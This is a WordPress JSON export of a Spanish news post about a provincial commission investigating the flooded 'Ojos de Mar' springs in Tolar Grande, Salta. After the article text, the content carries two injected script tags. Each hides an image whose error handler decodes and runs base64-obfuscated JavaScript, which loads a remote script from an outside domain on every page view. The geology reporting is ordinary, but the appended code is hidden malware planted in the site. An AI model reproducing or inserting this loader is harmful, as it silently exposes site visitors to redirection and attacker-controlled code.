{"id":3978,"date":"2024-05-09T13:44:44","date_gmt":"2024-05-09T16:44:44","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3978"},"modified":"2025-08-13T23:56:18","modified_gmt":"2025-08-14T02:56:18","slug":"trabajo-interdisciplinario-para-la-investigacion-de-los-ojos-de-mar","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3978","title":{"rendered":"Trabajo Interdisciplinario para la investigaci\u00f3n de los \u00abOjos de Mar\u00bb"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-61370d128b680b15faee5e4ba119c88f\" style=\"background-color:#8b074c\"><em>Para determinar a nivel cient\u00edfico que ocurri\u00f3 en los manantiales ubicados en Tolar Grande, se realiz\u00f3 una investigaci\u00f3n encabezada por el ge\u00f3logo Emilio Eveling. Los estudios arrojaron como resultado, que una serie de eventos climatol\u00f3gicos ser\u00edan las causales de las condiciones actuales.<\/em><\/h4>\n\n\n\n<p>El Ministerio de Producci\u00f3n y Desarrollo Sustentable, el Ministerio de Turismo y Deportes, y la Municipalidad de Tolar Grande crearon una comisi\u00f3n interinstitucional integrada por cient\u00edficos y autoridades del Gobierno Provincial, para investigar y tratar de determinar que sucedi\u00f3 con los denominados \u201cOjos de Mar\u201d en Tolar Grande. Los especialistas explicaron que el aumento en el nivel de agua en estos manantiales no es un evento extraordinario, sino que forma parte de su din\u00e1mica natural.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"3984\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/ojos-de-mar.jpg\" alt=\"\" class=\"wp-image-3984\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/ojos-de-mar.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/ojos-de-mar-300x225.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/ojos-de-mar-768x576.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/ojos-de-mar-560x420.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/ojos-de-mar-80x60.jpg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/ojos-de-mar-696x522.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/ojos-de-mar-265x198.jpg 265w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Antes<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"960\" height=\"640\" data-id=\"3985\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/95551-trabajo-interdisciplinario-para-la-investigacion-de-los-ojos-de-mar-2.jpg\" alt=\"\" class=\"wp-image-3985\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/95551-trabajo-interdisciplinario-para-la-investigacion-de-los-ojos-de-mar-2.jpg 960w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/95551-trabajo-interdisciplinario-para-la-investigacion-de-los-ojos-de-mar-2-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/95551-trabajo-interdisciplinario-para-la-investigacion-de-los-ojos-de-mar-2-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/95551-trabajo-interdisciplinario-para-la-investigacion-de-los-ojos-de-mar-2-630x420.jpg 630w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/95551-trabajo-interdisciplinario-para-la-investigacion-de-los-ojos-de-mar-2-696x464.jpg 696w\" sizes=\"(max-width: 960px) 100vw, 960px\" \/><figcaption class=\"wp-element-caption\">Ahora<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"960\" height=\"679\" data-id=\"3987\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/829223-capturas-20google-202010-2024-0.jpg\" alt=\"\" class=\"wp-image-3987\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/829223-capturas-20google-202010-2024-0.jpg 960w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/829223-capturas-20google-202010-2024-0-300x212.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/829223-capturas-20google-202010-2024-0-768x543.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/829223-capturas-20google-202010-2024-0-594x420.jpg 594w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/829223-capturas-20google-202010-2024-0-696x492.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/829223-capturas-20google-202010-2024-0-100x70.jpg 100w\" sizes=\"(max-width: 960px) 100vw, 960px\" \/><figcaption class=\"wp-element-caption\">Capturas en Google Earth. A la izquierda, los tres ojos de mar en junio de 2010. A la derecha, los mismos ojos en enero de 2024.<\/figcaption><\/figure>\n<\/figure>\n\n\n\n<p>La mesa de trabajo est\u00e1 formada por representantes de la Municipalidad de Tolar Grande, el Ministerio de Turismo y Deportes, la Secretar\u00eda de Ambiente y Desarrollo Sustentable, la Secretar\u00eda de Recursos H\u00eddricos, la UNSa y el INTA. Su objetivo primordial es analizar que sucedi\u00f3 con los cuerpos de agua. Los integrantes de la misma mantuvieron reuniones peri\u00f3dicas, y participaron en la presentaci\u00f3n sobre los resultados de los informes preliminares expuestos por el ge\u00f3logo Emilio Eveling, quien oportunamente fue contratado por el municipio de Tolar Grande para realizar los estudios necesarios.<\/p>\n\n\n\n<p>El informe contiene datos sobre an\u00e1lisis geol\u00f3gicos, an\u00e1lisis f\u00edsico-qu\u00edmicos de los cuerpos de agua, im\u00e1genes satelitales y estudios de la carga de la obra de infraestructura de pasarelas, para evaluar y comprender cu\u00e1les ser\u00edan las causas de la situaci\u00f3n actual de los llamados \u201cOjos de Mar\u201d. Oportunamente, Eveling explic\u00f3 que \u201clos niveles fueron aumentando progresivamente desde mayo de 2023 y se mantienen actualmente\u201d, y dijo \u201cel aumento en el nivel de agua en estos manantiales o lagunas fre\u00e1ticas no es un evento extraordinario, al contrario, forma parte de la din\u00e1mica propia de estos sistemas\u201d.<\/p>\n\n\n\n<p>En el documento presentado se indica que el nivel en los Ojos de Mar\u201d var\u00eda de acuerdo al ingreso de agua que tenga el sistema, es decir en veranos lluviosos o ante el aporte del derretimiento de las nieves principalmente, el nivel del agua sube, y por el contrario, cuando existen largos per\u00edodos de sequ\u00eda, el nivel baja.&nbsp;<\/p>\n\n\n\n<p>Cabe destacar que la situaci\u00f3n que se observa actualmente estar\u00eda relacionada a las lluvias ocurridas durante el verano de fines de 2021 e inicios de 2022, las cuales habr\u00edan aportado una cantidad de agua mayor a la \u201cnormal\u201d. Por otro lado, los pobladores del lugar comentaron que aproximadamente hace 30 a\u00f1os experimentaron la misma situaci\u00f3n en los ojos de mar.<\/p>\n\n\n\n<p>Durante los relevamientos de campo se pudo constatar en primera instancia, que las pasarelas no tendr\u00edan injerencia en los cambios que se observan. Las pasarelas est\u00e1n instaladas sobre vigas, las que est\u00e1n dispuestas sobre el suelo de manera horizontal y no est\u00e1n enterradas ni muestran rasgos de hundimiento o deformaci\u00f3n.<\/p>\n\n\n\n<p>En relaci\u00f3n al aspecto del cuerpo de agua, el ge\u00f3logo se\u00f1al\u00f3 que actualmente los ojos est\u00e1n inundados y forman una peque\u00f1a laguna. La laguna est\u00e1 afectada por los fuertes vientos del lugar y dan lugar a la formaci\u00f3n de oleaje, lo que produce erosi\u00f3n sobre los bordes y las partes m\u00e1s bajas del cuerpo de agua, y de esa manera pone en suspensi\u00f3n arenas finas y arcillas, lo que le da turbiedad al agua. Sin embargo, expres\u00f3 \u201cdurante la ma\u00f1ana temprano cuando el viento sopla con menos fuerza se puede ver que el agua est\u00e1 cristalina\u201d.<\/p>\n\n\n\n<p>En sinton\u00eda con lo antes expuesto, Eveling sostuvo que \u201csi bien los ojos de mar han estado inundados previamente, la l\u00e1mina de agua no habr\u00eda mantenido esa posici\u00f3n durante un tiempo prolongado y tampoco habr\u00eda alcanzado la altura actual\u201d. A eso agreg\u00f3, \u201cal menos en los registros que se analizaron no se observa una situaci\u00f3n similar a la actual en donde los tres ojos formen un solo cuerpo. Estas condiciones, sostenidas en el tiempo influir\u00edan en la fisonom\u00eda actual que se observa en el lugar, ya que los procesos de erosi\u00f3n y transporte de sedimentos dentro del cuerpo de agua comienzan a tener un rol m\u00e1s significativo dentro del mismo\u201d.<\/p>\n\n\n\n<p>Tras m\u00e1s de dos meses de trabajo, continuaron las reuniones de la comisi\u00f3n t\u00e9cnica con la finalidad de avanzar en la tarea de despejar dudas y presentar algunos avances que se llevaron a cabo desde el municipio. Durante el monitoreo en los ojos de mar y zonas aleda\u00f1as, se observ\u00f3 que la laguna se extendi\u00f3 hacia el sur y probablemente aumente su nivel debido al derretimiento de las nevadas que ocurren en el lugar, por ejemplo la nevada ocurrida recientemente el 15 de abril de este a\u00f1o.<\/p>\n\n\n\n<p>En base a los resultados obtenidos, el aumento del nivel de agua estar\u00eda relacionado con un fen\u00f3meno natural clim\u00e1tico vinculado al fen\u00f3meno de La Ni\u00f1a. Este fen\u00f3meno produce intensas precipitaciones en la zona de la puna, contrario a lo que ocurre en el resto del territorio donde predominan condiciones de sequ\u00eda. Para ajustar mejor estas interpretaciones se est\u00e1 trabajando con datos de estaciones meteorol\u00f3gicas y analizando el comportamiento de otras lagunas en la zona de la puna, finaliz\u00f3 el ge\u00f3logo Eveling.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12014-trabajo-interdisciplinario-para-la-investigacion-de-los-ojos-de-mar.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12014-trabajo-interdisciplinario-para-la-investigacion-de-los-ojos-de-mar.jpg\" alt=\"Trabajo Interdisciplinario para la investigaci\u00f3n de los \"\/><\/a><\/figure>\n\n\n\n<p><strong>El ministro De los R\u00edos recibe asesoramiento de especialistas de renombre internacional<\/strong><\/p>\n\n\n\n<p>Adem\u00e1s de la coordinaci\u00f3n de acciones a nivel interinstitucional que se viene realizando con especialistas de diferentes organismos, el ministro de Producci\u00f3n y Desarrollo Sustentable&nbsp;<strong>Mart\u00edn de los R\u00edos<\/strong>&nbsp;mantuvo una serie de reuniones con el doctor en Ciencias Geol\u00f3gicas,&nbsp;<strong>Ricardo Alonso<\/strong>.&nbsp;<\/p>\n\n\n\n<p>El reconocido ge\u00f3logo salte\u00f1o trabaja a la par, es consultado peri\u00f3dicamente y asesora de manera directa al ministro en la determinaci\u00f3n de las causas que pueden haber producido el fen\u00f3meno en los \u00abOjos de Mar\u00bb, para tratar de descartar motivos antr\u00f3picos, es decir causado o modificado por la actividad humana, y determinar si fueron razones naturales las que provocaron las modificaciones en los manantiales.&nbsp;<\/p>\n\n\n\n<p>Con los objetivos antes mencionados, se est\u00e1n cotejando informes meteorol\u00f3gicos de precipitaciones pluviales y nivales de distintos registros que existen en la zona, provistos por diversas empresas. Adem\u00e1s, se analizan estudios y registros hidrogeol\u00f3gicos vinculados al fen\u00f3meno clim\u00e1tico \u00abLa Ni\u00f1a\u00bb en la Cordillera, el cual produce exceso de precipitaciones y podr\u00eda ser el causal de la situaci\u00f3n en Tolar Grande.&nbsp;<\/p>\n\n\n\n<p>Con la informaci\u00f3n obtenida, y la comparaci\u00f3n de datos se busca establecer con precisi\u00f3n cient\u00edfica lo ocurrido, con la finalidad de verificar el impacto hist\u00f3rico en la regi\u00f3n a fin de cotejar y establecer mediante el an\u00e1lisis de todos los estudios realizados y los que est\u00e1n en proceso, las razones exactas del oscurecimiento de los manantiales.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/trabajo-interdisciplinario-para-la-investigacion-de-los-ojos-de-mar-95551\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Para determinar a nivel cient\u00edfico que ocurri\u00f3 en los manantiales ubicados en Tolar Grande, se realiz\u00f3 una investigaci\u00f3n encabezada por el ge\u00f3logo Emilio Eveling. Los estudios arrojaron como resultado, que una serie de eventos climatol\u00f3gicos ser\u00edan las causales de las condiciones actuales. El Ministerio de Producci\u00f3n y Desarrollo Sustentable, el Ministerio de Turismo y Deportes, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3979,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[4,15],"tags":[],"class_list":{"0":"post-3978","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-paisajes","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3978"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3978"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3978\/revisions"}],"predecessor-version":[{"id":6791,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3978\/revisions\/6791"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3979"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3978"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3978"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3978"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}